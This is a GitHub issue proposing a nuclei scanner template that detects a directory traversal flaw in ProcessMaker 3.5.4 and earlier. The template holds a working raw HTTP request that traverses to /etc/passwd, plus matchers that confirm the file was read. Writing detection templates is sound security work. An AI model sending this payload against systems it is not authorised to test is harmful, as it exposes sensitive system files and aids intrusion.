### ISSUE TITLE
[nuclei-template] ProcessMaker <= 3.5.4 Directory Traversal

### ISSUE THREAD

**Issue by KrE80r** [projectdiscovery/nuclei-templates#2506]
```yaml
id: processmaker-lfi

info:
  name: ProcessMaker <= 3.5.4 Directory Traversal
  author: KrE80r
  severity: high
  tags: processmaker,lfi
  reference: https://www.exploit-db.com/exploits/50229
  additional-fields:
    vendor: https://www.processmaker.com

requests:
  - raw:
      - |
        GET /../../../..//etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "root:x:0"
```
